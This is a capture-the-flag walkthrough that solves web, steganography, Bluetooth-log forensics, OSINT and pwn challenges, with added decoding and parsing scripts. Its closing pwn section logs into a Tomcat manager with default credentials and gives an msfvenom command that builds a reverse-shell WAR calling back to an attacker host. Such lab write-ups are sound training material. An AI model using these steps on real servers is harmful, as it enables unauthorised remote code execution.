
Sector443 CTF Walkthrough


This is where it all started: I was watching an episode of The Boys when a friend of mine gave me a link to this CTF and asked me to play if I had the time, and I had plenty XD
Most of the challenges were based on reverse engineering binaries.

Web

The challenge gives us an HTML file. When opened in a browser it shows a prompt to enter a password; the end goal is to find that password, which is the flag.

Here is the code. By the looks of it I can see a load of variable declarations and looping; the hex string looks promising, and printing it on the console spits out some char codes:

console.log("\x31\x30\x32\x2c\x31\x30\x38\x2c\x39\x37\x2c\x31\x30\x33\x2c\x31\x32\x33\x2c\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30\x2c\x31\x32\x35");

Now we have a set of char codes, which can be converted back to text using the String.fromCharCode function (the original used print(), which in a browser only opens the print dialog; console.log shows the result):
console.log(String.fromCharCode(102, 108, 97, 103, 123, 55, 56, 54, 79, 115, 69, 114, 116, 107, 49, 50, 125));

Which returns the flag "flag{786OsErtk12}"
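The same decoding done as a small script, added here as an example and not part of the original write-up: it takes the literal as it appears in the HTML file and peels both layers (the \xHH escapes and the comma-separated char codes) without executing any of the challenge's own JavaScript, which is the habit you want when looking at obfuscated scripts from an untrusted page. The helper names are my own.

```javascript
// Added example (not the write-up's own code): decode the obfuscated
// literal from the challenge HTML without evaluating it. Two layers:
// "\xHH" escapes hide a comma-separated list of decimal char codes,
// and those codes spell the flag.

// The literal exactly as it appears in the page, kept raw so the
// backslashes are data rather than interpreted escapes.
const RAW_LITERAL = String.raw`\x31\x30\x32\x2c\x31\x30\x38\x2c\x39\x37\x2c\x31\x30\x33\x2c\x31\x32\x33\x2c\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30\x2c\x31\x32\x35`;

// Layer 1: turn every "\xHH" sequence into the character it encodes.
function decodeHexEscapes(raw) {
  return raw.replace(/\\x([0-9a-fA-F]{2})/g, (_, hh) =>
    String.fromCharCode(parseInt(hh, 16)));
}

// Layer 2: parse "102,108,97,..." into text. Anything that is not a plain
// decimal code is rejected so garbage does not silently become a "flag".
function charCodesToString(csv) {
  const codes = csv.split(',').map(s => s.trim());
  if (!codes.every(c => /^\d+$/.test(c))) {
    throw new Error('unexpected token in char-code list: ' + csv);
  }
  return String.fromCharCode(...codes.map(Number));
}

function solveWebChallenge(raw) {
  return charCodesToString(decodeHexEscapes(raw));
}

console.log(solveWebChallenge(RAW_LITERAL)); // flag{786OsErtk12}
```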

Steg

The challenge gives us a GIF of Captain America flying.

(original image from challenge)

By running binwalk over it to check for hidden files we can see that there is a RAR file embedded in the GIF.

After extracting the RAR file we have another image and a text file:



Chasing and avenging the Hydra's head Arnim Zola, Captain America finally got control over the ship and crashed into the Arctic, going into an unconscious sleep of "steghide". Releasing next: Captain America "wintersoldier"

So we have steghide and wintersoldier, which means only one thing: run steghide extract on the image with wintersoldier as the passphrase.

That gives us the flag flag{YzRwdDQxbl80bTNyMWM0}
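What binwalk did in the first step of this challenge, written out by hand as an added example (not part of the original write-up): scan a file for known magic bytes, report the offsets, and carve the RAR that was appended after the GIF. The signature table and the sample GIF bytes are constructed for the demo; the sample is not the challenge image, and the carved "archive" is only a signature plus placeholder bytes.

```javascript
// Added example (not the write-up's own code): a signature scan of the
// kind binwalk performs, plus carving of an embedded RAR. The GIF bytes
// below are constructed for the demo, not the challenge image.

const SIGNATURES = [
  { name: 'GIF89a', magic: Buffer.from('GIF89a', 'latin1') },
  { name: 'GIF87a', magic: Buffer.from('GIF87a', 'latin1') },
  { name: 'RAR v1.5-4.x', magic: Buffer.from([0x52, 0x61, 0x72, 0x21, 0x1a, 0x07, 0x00]) },
  { name: 'RAR v5', magic: Buffer.from([0x52, 0x61, 0x72, 0x21, 0x1a, 0x07, 0x01, 0x00]) },
  { name: 'ZIP', magic: Buffer.from([0x50, 0x4b, 0x03, 0x04]) },
  { name: 'PNG', magic: Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]) },
];

// Return every place a known magic occurs, sorted by offset.
function scanSignatures(buf) {
  const hits = [];
  for (const { name, magic } of SIGNATURES) {
    let pos = buf.indexOf(magic, 0);
    while (pos !== -1) {
      hits.push({ offset: pos, name });
      pos = buf.indexOf(magic, pos + 1);
    }
  }
  return hits.sort((a, b) => a.offset - b.offset);
}

// Carve the first RAR found, from its signature to end of file (what
// binwalk -e does for an appended archive). Returns null if none.
function carveRar(buf) {
  const hit = scanSignatures(buf).find(h => h.name.startsWith('RAR'));
  return hit ? buf.subarray(hit.offset) : null;
}

// Constructed sample: GIF89a header, 64 bytes of filler, the GIF trailer
// byte 0x3B, then a RAR4 marker block followed by placeholder bytes that
// stand in for the archive body (not a valid archive).
const SAMPLE_GIF = Buffer.concat([
  Buffer.from('GIF89a', 'latin1'),
  Buffer.alloc(64, 0x00),
  Buffer.from([0x3b]),
  Buffer.from([0x52, 0x61, 0x72, 0x21, 0x1a, 0x07, 0x00]),
  Buffer.alloc(6, 0x00),
]);

console.log(scanSignatures(SAMPLE_GIF));
// [ { offset: 0, name: 'GIF89a' }, { offset: 71, name: 'RAR v1.5-4.x' } ]
```

The offset report is the part worth keeping around: a GIF that ends with 0x3B and then carries more bytes is the tell, and the same scan finds archives appended to PNGs or JPEGs.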

Forensics

In this challenge we are given a btsnoop log file from which we have to find the unlock sequence and recover the value, which is the flag. We can open the log file in Wireshark.

 
Now we have to find the unlock request. As the challenge description says, the unlock request is sent through an app, so the source would be a smartphone and the destination the smart lock.

By filtering on the source and searching for a Value attribute I was able to figure out the unlock request.
As the image shows, a Write Request is sent from a Redmi4 to the smart lock with handle 0x0003, and as per the challenge description there should be 5 requests; by counting them I knew this was it.
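The same filtering done without a GUI, as an added example that is not part of the original write-up: a minimal parser for the Android btsnoop_hci.log format (datalink 1002, HCI UART/H4 records) that walks H4, ACL, L2CAP and ATT and lists the Write Requests the phone sent to one attribute handle, in capture order. The capture at the bottom is constructed for the demo, the five byte values written to handle 0x0003 are made up, and the function names are my own; the direction flag comes from the btsnoop record header, which is the same thing Wireshark shows as Sent/Rcvd.

```javascript
// Added example (not the write-up's own code): list ATT Write Requests to
// one handle from a btsnoop_hci.log capture (datalink 1002, HCI UART/H4).
// The capture below is constructed; the written values are made up.

const BTSNOOP_MAGIC = 'btsnoop\0';
const DATALINK_H4 = 1002;      // HCI UART (H4): each record starts with a packet-type byte
const H4_ACL = 0x02;           // ACL data packet
const L2CAP_CID_ATT = 0x0004;  // fixed L2CAP channel for ATT
const ATT_WRITE_REQ = 0x12;
const ATT_WRITE_RSP = 0x13;

// File: 8-byte magic, u32 version, u32 datalink; then per record a 24-byte
// header (u32 original len, u32 included len, u32 flags, u32 drops,
// u64 timestamp; all big-endian) followed by the packet bytes.
function parseBtsnoop(buf) {
  if (buf.toString('latin1', 0, 8) !== BTSNOOP_MAGIC) throw new Error('not a btsnoop file');
  if (buf.readUInt32BE(8) !== 1 || buf.readUInt32BE(12) !== DATALINK_H4) {
    throw new Error('only btsnoop v1 with HCI UART (H4) records is handled here');
  }
  const records = [];
  let off = 16;
  while (off + 24 <= buf.length) {
    const inclLen = buf.readUInt32BE(off + 4);
    const flags = buf.readUInt32BE(off + 8);    // bit 0: 0 = sent by host, 1 = received
    const ts = buf.readBigUInt64BE(off + 16);   // microseconds, btsnoop epoch
    off += 24;
    if (off + inclLen > buf.length) break;      // truncated final record: stop, do not crash
    records.push({ sent: (flags & 1) === 0, ts, data: buf.subarray(off, off + inclLen) });
    off += inclLen;
  }
  return records;
}

// H4 type byte -> ACL header (4) -> L2CAP header (4) -> ATT PDU.
function attWriteRequests(records, handle) {
  const hits = [];
  for (const r of records) {
    const d = r.data;
    if (d.length < 12 || d[0] !== H4_ACL) continue;   // 1 + 4 + 4 + 3-byte minimum ATT PDU
    const l2capLen = d.readUInt16LE(5);
    const cid = d.readUInt16LE(7);
    if (cid !== L2CAP_CID_ATT || 9 + l2capLen > d.length) continue;
    const att = d.subarray(9, 9 + l2capLen);
    if (att[0] !== ATT_WRITE_REQ || att.readUInt16LE(1) !== handle) continue;
    hits.push({ sent: r.sent, value: att.subarray(3).toString('hex') });
  }
  return hits;
}

// The unlock sequence is the values the phone wrote to the handle, in order.
function unlockSequence(buf, handle) {
  return attWriteRequests(parseBtsnoop(buf), handle)
    .filter(w => w.sent)
    .map(w => w.value)
    .join(' ');
}

// --- constructed capture for the demo --------------------------------
function h4Record(sent, attPdu) {
  const l2cap = Buffer.alloc(4 + attPdu.length);
  l2cap.writeUInt16LE(attPdu.length, 0);
  l2cap.writeUInt16LE(L2CAP_CID_ATT, 2);
  attPdu.copy(l2cap, 4);
  const acl = Buffer.alloc(5 + l2cap.length);
  acl[0] = H4_ACL;
  acl.writeUInt16LE(0x0040, 1);        // connection handle 0x40, PB/BC flags 0
  acl.writeUInt16LE(l2cap.length, 3);
  l2cap.copy(acl, 5);
  const hdr = Buffer.alloc(24);
  hdr.writeUInt32BE(acl.length, 0);    // original length
  hdr.writeUInt32BE(acl.length, 4);    // included length
  hdr.writeUInt32BE(sent ? 0 : 1, 8);  // direction flag
  return Buffer.concat([hdr, acl]);
}
const writeReq = (handle, value) =>
  Buffer.concat([Buffer.from([ATT_WRITE_REQ, handle & 0xff, handle >> 8]), Buffer.from(value)]);
const writeRsp = Buffer.from([ATT_WRITE_RSP]);

const SAMPLE_CAPTURE = Buffer.concat([
  Buffer.from(BTSNOOP_MAGIC, 'latin1'),
  Buffer.from([0, 0, 0, 1, 0, 0, 0x03, 0xea]),              // version 1, datalink 1002
  h4Record(true, writeReq(0x0003, [0x31])), h4Record(false, writeRsp),
  h4Record(true, writeReq(0x0005, [0xaa])),                   // noise: write to another handle
  h4Record(true, writeReq(0x0003, [0x33])), h4Record(false, writeRsp),
  h4Record(true, writeReq(0x0003, [0x33])), h4Record(false, writeRsp),
  h4Record(true, writeReq(0x0003, [0x37])), h4Record(false, writeRsp),
  h4Record(true, writeReq(0x0003, [0x39])), h4Record(false, writeRsp),
]);

console.log(unlockSequence(SAMPLE_CAPTURE, 0x0003)); // 31 33 33 37 39
```

On a real phone capture the ACL packets may be fragmented (PB flag 01 continuation packets); this parser only looks at first fragments, which is enough for short ATT writes like a lock code but would need reassembly for larger values.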

OSINT
In this challenge the goal is to find a person named "Peter Grulich" who likes ponies, and then find the flag. I started my search on Google by entering the following:


The first hit is a GitHub profile. Investigating it, I noticed that the account was created at the time of the CTF and has only one repository; looking at the commit history there is a peculiar commit.

By checking the "Remove secret" commit we have the flag.


Pwn


In this challenge we have to download a VM and import it into VirtualBox in order to solve the challenge. Before that, a host-only network has to be set up in order to access the box (which I didn't like). After importing the machine and starting it we have a static IP address.
By running an nmap scan against the IP address we can see that port 8080 is open and is running Apache Tomcat.


By checking the manager page we get a login prompt; by trying admin:admin we are able to log in to the app.
Now we can upload a shell and gain code execution. I used Metasploit to generate the payload:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.x.x LPORT=xxxx -f war > shell.war

Now all we have to do is start an exploit handler in Metasploit, upload the WAR file through the manager and execute it.